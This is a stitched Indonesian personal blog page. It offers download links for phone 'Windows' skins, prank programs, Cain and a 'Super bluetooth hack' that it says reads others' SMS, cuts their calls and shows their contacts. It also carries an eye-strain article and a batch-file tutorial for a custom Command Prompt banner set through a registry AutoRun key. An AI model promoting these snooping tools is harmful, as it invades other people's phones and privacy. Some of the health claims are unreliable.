sama seperti diatas yang bedanya ini windows 7 yang di hp anda,semoga mencoba disini downloadnya

3.win vista mobile
sama juga!..kya diatas beda'a ya itu juga kali ini vista yang di hp mu..download tiga-tiganya untuk hp kmu juga tidak masalah..ga menyedot banyak memooty hp kok..dsini ni kalo mo download win vista mobilenya..

4.operamod
ini software sama dengan opera mini di hp,tapi software untuk hp yang satu ini,agak sedikit berbeda dengan opera mini..jangan kasih tau ah...pokoknya asik deeh..download disini buat yang penasaran,klo yang ga penasaran ya coba aja..ga nyesel kok

5.anti Copas
software ini untuk meniadakan klik kanan saat di blog,dsb
cara menggunakannya belum pasti tapi ya coba dulu,download disini
kalo ngerti kasih komentar ya,saya butuh info

6.icofx setup
ini untuk mempermudah membuat gambar berestensi .ico di artikel sebelumnya saya memberitahu cara mengganti icon flashdisk,syarat'a gambar yang ingin kita jadikan icon untuk flashdisk harusah bersetensi .ico ini softwarenya untuk mempermudah syarat tersebut download disini ya

7.balik
software ini sesuai namanya,ini membalikan gambar dekstop,180 derajat ke bawah,download
disini

8.avoid
saat aplikasi ini dijalankan,coba anda klik start..lho..kemana? kok menghindar..hahaha uniknya
download disini untuk jahilin temanmu

9.Super bluetooth hack
sebenarnya saya ragu membagikan ini..karena bersifat usil gilaa!
tapi untuk teman-teman tercinta..ga papaa deh..aplikasi ini untuk membaca sms,memutuskan pembicaraan (telpon),silent,aktifkan alarm,lihat kontak,dan masih banyak lagi..download
disini aja ya..

10.cain
software ini sungguh sering digunakan untuk para hacker,mereka akan menjawab cain saat anda bertanya software andalan mereka karena ini multifungsi,mungkin juga tidak..pelajari sendiri/berdua dengan om goolge ya..downloadnya disini

11.bootracer
software ini untuk menghitung berapa kecepatan booting komputer anda,setelah diinstal,maka saat masuk komputer di pojok bawah kanan ada aplikasi tersebut,setelah waktu berhenti anda bisa mengecheknya dengan klik "see why" disana..skrng klik disini untuk softwarenya

12.internet ownload manager
idm adlah software mengoptimalkan saat anda mendownload,software ini sangat bagus,dan patut anda miliki dan anda coba download disini ya

13.instalasi pengusir nyamuk
bagi yang suka begadang seperti saya..tapi bingung gimana cara mengusir nyamuk yan kelaparan,siap menerkam kita..sekarang saya mempuyai solusi tersebut anda tinggal mendownload dan menjalankan aplikasi ini,di jamin nyamuk ngacir,karena aplikasi ini mengeluarkan gelombang bunyi (apalah saya kurang mengerti)20.000-i don;t know hz yang memungkinkan nyamuk pergi
download disini

14.IE 9
(internet explore 9) aplikasi ini dapat anda rasakan perbedaannya dengan IE yang lain..langsung praktek aja sendiri ya..download disini

15.usb autorunner
software ini untuk membuat autorun pada flashdisk,jadi saat di colok flashdisknya program yang ingin anda buka bisa lsng dijalankan..maaf saya tidak mengerti bahasanya,jadi hanya diulas sedikit ya download disini

16.barking
aplikasi ini untuk hp java..mungkin symbian juga bisa,download disini aja

17.burping
sama kya di atas bedanya ini sura sendawah..hahaha mantap untuk mengrajin temen,download disini ya

18.cainsaw
aplikasi suara ini juga sama seperti diatas,kali ini suara gergaji mesin,bisa bikin temen kebingungan mungkin ya? :/ ya gitu lah..cobain nih download disini aj biar gampang

maaf sekali jika ada kesalahan apapun ya...saya hanya newbe yg ingin membagikan kepada kalian..
trimakasih,mohon koentarnya ya... salam,
jangan menyerah mencoba dan mencari software baru
semoga berhasil
baca artikel selanjutnya disini
terus kunjungi blog saya ya...trimakasih

Software hacking

Skrng saya mau bagi-bagi nih software-software kesukaan saya...free download kok


1.win xp mobile
ni software unik,windows xp yang di komputer kini ada di Hp,tapi tidak seuunggul di komputer pastinya,tapi software ini juga ga kalah mengasikan.. kalo penasaran download disini ya

2.win 7 mobile
sama seperti diatas yang bedanya ini windows 7 yang di hp anda,semoga mencoba disini downloadnya

3.win vista mobile
sama juga!..kya diatas beda'a ya itu juga kali ini vista yang di hp mu..download tiga-tiganya untuk hp kmu juga tidak masalah..ga menyedot banyak memooty hp kok..disni ni kalo mo download win vista mobilenya

4.operamod
ini software sama dengan opera mini di hp,tapi software untuk hp yang satu ini,agak sedikit berbeda dengan opera mini..jangan kasih tau ah...pokoknya asik deeh..download disini buat yang penasaran,klo yang ga penasaran ya coba aja..ga nyesel kok

Melindungi Mata Dari Radiasi Komputer

Komputer dan berbagai perlengkapannya, seperti monitor, sudah menjadi barang awam dalam setiap pekerjaan kantor. Bukan hal yang asing jika banyak orang harus bekerja di depan monitor sepanjang hari.
Pada awalnya kita mungkin sedikit khawatir mengenai pengaruh komputer dan sinar radiasi yang dipancarkan monitor dapat mengganggu kesehatan tubuh, terutama mata. Namun, para ahli pun tak pernah menyerah untuk menciptakan peralatan yang semakin ramah dengan lingkungan dan kesehatan.
Mata merupakan salah satu aset yang paling berharga sehingga harus dijaga benar kesehatannya. Keseringan melototin monitor komputer bisa membuat mata menjadi lelah.


Tahukah Anda bahwa radiasi gelombang elektromagnetik yang ditimbulkan komputer bisa mengganggu kesehatan?
Studi yang dilakukan American Optometric Association (AOA) mencetuskan bahwa radiasi komputer dapat menyebabkan kelelahan mata dan gangguan mata lainnya. Kebanyakan gejala yang dikeluhkan responden adalah soal kelelahan mata, pandangan menjadi kabur dan mata kering. Masalah visual lainnya yang timbul adalah dapat mempengaruhi kesehatan, seperti mata lelah, nyeri punggung, bahu dan leher.
Nah bagi Anda yang sering nongkrong di depan komputer, lindungi dan rawatlah mata Anda dari radiasi yang ditimbulkannya. Berikut beberapa trik mengatasi kelelahan dan ketegangan mata di saat bekerja di depan monitor. Mudah-mudahan kita bisa menjaga karunia mata yang tetap, meski harus bekerja berjam-jam.
1. Gunakan filter monitor.
Untuk mengurangi sinar yang menyilaukan dan radiasi yang dipancarkan layar monitor, gunakan filter glass monitor. Berbicaralah pada vendor perlengkapan komputer anda untuk mendapatkan filter yang baik dan mampu mengurangipengaruh radiasi, bukan hanya sekedar meredupkan cahaya monitor.
2. Periksa monitor anda dan pilih layar komputer yang radiasinya rendah, seperti layar LCD (liquid crystal display).
Periksa apakah monitor anda masih bekerja dengan baik? Bandingkan dengan monitor lain. Bila gambar yang tampak semakin buram, berkedip-kedip atau tidak nyaman bagi mata anda, maka sudah waktunya untuk memperbaiki atau mengganti monitor itu. Lebih baik mengganti monitor daripada membiarkan mata anda terganggu. Sering-seringlah membersihkan monitor dari debu dan kotoranyang mengganggu layar
3. Jagalah jarak pandangan mata dengan monitor.
Idealnya, jarak minimum antara mata dengan monitor komputer adalah 45 cm.
4. Perhatikan posisi monitor.
Sesuaikan posisi layar komputer dengan mata, jangan ketinggian dan jangan terlalu rendah karena bisa menyebabkan sakit leher. Selain itu, jika monitor terlalu tinggi dari pandangan mata maka akan menggangu pasokan udara yang disuplai ke otak. Sebaiknya layar monitor diposisikan sejajar dengan pandangan mata.
Letakkan layar monitor sedemikian rupa sehingga membentuk sudut antara 10-15 derajat dari posisi sejajar dengan pandangan lurus anda. Hal ini selain agar tidak melelahkan mata anda, juga menjaga agar bahu dan leher anda cukupnyaman bekerja
Menurut American Optometric Association (AOA), seperti dilansir Rctimes, untuk mencegah kelelahan mata sebaiknya tempatkan monitor dengan posisi yang ergonomis. Monitor harus ditempatkan pada posisi 16-30 inci dari mata, tergantung seberapa besar layar. Umumnya posisi yang nyaman untuk menatap monitor adalah 20 hingga 26 inci.
5. Sesuaikan pencahayaan monitor dengan intensitas kenyamanan mata.
Brightness yang terlalu terang atau terlalu buram tidak baik bagi kesehatan mata. Pencahayaan yang terlalu terang akan membuat mata menjadi silau, sedangkan pencahayaan yang terlalu buram hanya dan membuat mata bekerja lebih keras untuk melihat. Hal ini akan membuat mata menjadi cepat lelah. Untuk itu, cobalah sesuaikan brightness dan contrast monitor hingga mata Anda bisa melihat dengan nyaman. Jangan lupa juga untuk menyesuaikan resolusi dengan karakter di monitor agar dokumen-dokumen mudah dibaca mata.
6. Bekerjalah dalam ruangan yang cukup cahaya.
Perhatikan pencahayaan dalam ruang kerja anda. Jangan bekerja dalam ruangan yang terlalu terang dan menyilaukan mata. Gunakan kerai untuk mengatur cahaya dari jendela. Letakkan lampu di atas kepala. Hindari anda menatap cahayanya secara langsung. Sebaliknya, jangan pula bekerja dalam ruangan yang terlalu gelap atau redup. Usahakan agar ruangan anda cukup terang agar mata anda tidak bekerja terlalu keras.
7. Letakkan kertas kerja agar mudah dibaca.
Jika anda harus bekerja dengan menyalin atau membaca kertas kerja, maka letakkan kertas kerja tersebut dalam jarak yang seimbang dengan monitor anda. Ini agar anda tidak perlu bolak-balik memfokuskan pandangan untuk membaca kertas kerja anda, setelah membaca di layar monitor.
8. Bekerjalah dengan “font” yang cukup besar.
Bila anda harus mengedit tulisan di depan komputer, pastikan ukuran atau “font” hurup yang anda gunakan cukup besar. Jangan paksa mata anda untuk membaca huruf kecil pada monitor. Mata anda bukanlah mikroskop bagi tulisan yang ada di layar monitor. Gunakan fasilitas untuk memperbesar atau menyesuaikan besar tampilan gambar di monitor anda. Bila anda telah selesai mengedit atau membacanya, anda bisa kembalikan font tersebut ke posisi semula.
9. Istirahatkan mata sejenak.
Jangan terus-terusan melototin layar komputer. Usahakan sediakan waktu beberapa menit untuk mengendorkan dan mengistirahatkan mata Anda. Ini akan mengurangi kepenatan mata dan otot. Segarkan mata dengan cara memandang ke ruangan lain atau memandang indahnya langit biru atau tanaman hijau.
Selain itu, pejamkan atau berkekerjap-kerjiplah dan jangan kucek-kucek mata anda. Namun, sering-seringlah berkedip. Ini dapat menurunkan ketegangan dan menjaga mata anda tetap basah dan sejuk. Bila anda terlalu lama melihat dalam jarak dekat, alihkan pandangan anda ke arah yang jauh. Lakukan ini selama beberapa menit setiap 30 menit.
Karena bila mata jarang berkedip akan membuat mata menjadi kering. Karena itu sering-seringlah mengedipkan mata, karena dengan berkedip maka mata akan mengeluarkan air mata yang akan menyebar ke seluruh permukaan kornea untuk menjaga mata tetap lembab dan jernih.
10. Pakailah kacamata dengan lensa khusus untuk komputer.
Seperti pernah diberitakan, ahli masalah mata (Optometrist) Dr. Jay Schlanger mengatakan beberapa perusahaan kini mulai membuat lensa yang bagian atasnya dirancang untuk melihat komputer, dan bagian bawahnya untuk membaca.
Bila anda menggunakan kacamata atau lensa kontak dan anda harus bekerja sepanjang hari di depan monitor, ada baiknya anda konsultasikan dengan dokter mata atau optik anda agar anda bisa mendapatkan kacamata yang sesuai. Baik, ukuran lensa dan framenya. Bila anda merasa lelah menggunakan kacamata, tanggalkan saja. Kacamata bisa membuat mata lelah. Sesekali biarkan mata anda melihat bebas. Namun, segera kenakan kacamata anda bila merasa harus mengenakannya. Jangan paksa mata anda melihat tanpa bantuan kacamata anda.
Pengguna lensa kontak juga punya solusi, yaitu dengan mengganti lensa kontak generasi baru yang terbuat dari silikon hydrogel. Silikon jenis ini memungkinkan daya transmisi oksigen yang lebih tinggi dibanding jenis lain.
11. Perbanyak konsumsi vitamin A agar mata tetap dalam kondisi baik.
12. Jika merasa mata mengalami gangguan, segera pergi ke dokter mata untuk meyakinkan bahwa mata Anda benar-benar sehat.
TIPS Menjaga Mata Tetap Sehat
AHLI glaukoma di JEC, dr Abdul Manan Ginting SpM, memberi tips sederhana untuk mencegah kebutaan glaukoma. Penyakit glaukoma terjadi akibat adanya tekanan mata atau tekanan intraocular yang tinggi sehingga si penderita mengalami kerusakan serabut saraf mata yang menimbulkan kehilangan lapang pandang (skotoma). Bila tekanan tersebut terjadi terus menerus, maka seluruh saraf akan rusak dan akibatnya adalah kebutaan total. Di Indonesia, angka kebutaan mencapai 1,5 persen dari jumlah penduduknya, glaukoma merupakan penyebab kebutaan kedua terbesar (o,2 persen) setelah katarak.
Tips-tips tersebut yaitu:
Periksa mata secara teratur 6 bulan sekali, terutama bagi mereka yang berusia 40 tahun ke atas; waspada bila mata mendadak merah, kepala pusing, dan perut mual, atau melihat pelangi; dan segeralah pergi ke dokter.
Meminimalisasi faktor risiko. Cobalah senantiasa hidup sehat dengan berolahraga dan jangan membaca di tempat gelap atau sambil tidur. Beberapa ahli glaukoma mengatakan, olahraga seperti aerobik bagus untuk menurunkan TIO dan memperlancar sirkulasi darah ke retina dan saraf optik.
Penggunaan sunglass atau kacamata dengan lensa berwarna bisa membantu mengurangi efek silau. Lensa berwarna kuning, amber (kuning sawo), atau cokelat adalah pilihan terbaik untuk menangkal sinar dari lampu yang berpijar. Di siang hari yang terik, gunakan kacamata dengan lensa berwarna cokelat.

Aug 23, 2011

Software Untuk Mengerjain Teman,Usil!

Avoid
Program akan selalu memindah tombol Start saat Anda mencoba mengkliknya. Cukup mengasyikkan untuk mengerjai teman Anda :) Untuk menutup program ini arahkan cursor mouse ke pojok kiri atas, lalu pada kotak dialog yang muncul klik tombol Close.
Download disini


Floppy Madness
Program 'usil' ini akan mengakses floppy drive tiap interval waktu yang dapat Anda tentukan. Secara default program akan mengakses drive A tiap satu menit. Untuk menutup program ini arahkan cursor mouse ke pojok kiri atas, lalu pada kotak dialog yang muncul klik tombol Close.
Download disini

Happy Fred
Program ini akan menampilkan sosok kartun Fred yang dapat berlari, terbang, ataupun terjun pada desktop Anda. Dapat juga digunakan sebagai pengganti screen saver.
Download disini

Tikus
Program yang mungkin dapat menghibur sekaligus menipu Anda :)
Download disini


Bola Mata
Program untuk menampilkan sepasang bola mata yang selalu melirik kearah kursor mouse di Windows
Download disini

Balik
Software ini akan membalik tampilan monitor Anda.
Download disini

Burung
Akan menampilkan seekor burung yang terbang di desktop komputer Anda.
Download disini

Cara Mengubah Tampilan Pada Command Prompt Di Windows


Command Prompt ( cmd.exe ) merupakan tool bawaan Windows yang sangat berguna.

Tool ini dapat digunakan untuk mengecek error pada media penyimpanan, melakukan format pada media penyimpanan, melihat sekaligus mengedit isi registry, mengecek sekaligus mengganti ip, menjalankan dan mematikan services, melihat jalur yang dilewati paket data di internet, melihat port yang terbuka ketika terjadi hubungan antar komputer, melihat sekaligus mematikan program yang sementara berjalan, melakukan proses shutdownrestartlog off komputer serta bermacam-macam kegunaan yang lain yang dapat anda lihat dengan mengetik perintah help pada Command Prompt.

Selain itu, tool-tool seperti kaht, nmap, netcat, snort, metasploit framework, tcpdump, john the ripper, ettercap dan tool-tool command line-based lainnya, menggunakan perantara dari Command Prompt agar dapat berjalan ( namanya juga tool-tool command line-based).

Pernakah timbul di benak Anda untuk dapat mengganti banner default dari Command Prompt tersebut yang hanya berupa tulisan Microsoft Windows [Version 6.x.x] Copyright © 2006 Microsoft Corp.

Langkah-langkah membuat banner hingga menaruhnya di Command Prompt adalah sebagai berikut :
Pertama, bukalah notepad, kemudian ketiklah script di bawah ini :

@echo off
title Have A Nice Day ...
cls
color 0a
echo.
echo ÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛ
echo ÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛ ÛÛÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛ ÛÛ ÛÛ
echo ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ
echo ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛ
echo ÛÛÛ
echo ÛÛÛ
echo ÛÛÛ
echo.
echo ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
echo Û Û
echo Û Hello %username%, Welcome To CMD ... Û
echo Û Û
echo ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
echo.

dan simpanlah di drive C dengan ekstensi .bat dengan nama terserah..,
untuk lebih jelas penjelasan script di atas nie:
@echo off memiliki arti script yang kita ketik tersebut tidak akan ditampilkan pada user
title Have A Nice Day … memiliki arti Command Prompt akan memiliki judul ( title ) Have A Nice Day
cls memiliki arti membersihkan atau menghapus semua tulisan pada layar Command Prompt kecuali tulisan lokasi direktori tempat kita sedang bekerja pada saat itu misalnya c:> ( inilah perintah yang digunakan untuk menghilangkan banner default dari Command Prompt )
color 0a memiliki arti tulisan dari Commadn Prompt akan berwarna hijau terang ( untuk warna yang lain, Anda dapat mengetik perintah color /? pada Command Prompt untuk melihat daftar warna yang ada.
echo. .Memiliki arti mengosongkan satu baris ( mirip membuat baris baru pada microsoft word atau notepad )

string echo ÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛ smpe echo ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

memiliki arti menuliskan tulisan setelah perintah echo pada layar Command Prompt ( tulisan sesudah perintah echo tersebut yang nantinya akan menjadi banner kita. Untuk dapat membuatnya, Anda haru melatih menyusun simbol menjadi huruf, sebagai langkah awal, Anda dapat belajar menggambarnya pada buku berpetak seperti yang saya lakukan dulu XD Ingat, No Pain No Gain Gan…,

Kedua, bukalah Command Prompt kemudian tuliskan script di bawah ini :
reg add “HKLMSoftwareMicrosoftCommand Processor” /v AutoRun /t REG_SZ /d “Call C:Terserah.bat” /f

Jalankanlah Command Prompt seperti biasa. Jika Anda telah melakukan langkah-langkah di atas
maka cmd promt anda akan seperi ini gambar dibawah ini:



Read more: http://blog.fastncheap.com/cara-mengubah-tampilan-pada-command-promt-windows/#ixzz1VuUfdstp